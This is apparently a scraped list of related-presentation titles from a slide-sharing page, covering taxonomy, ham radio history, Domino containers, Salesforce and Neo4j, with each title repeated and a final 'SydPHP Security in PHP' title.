The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 

SydPHP Security in PHP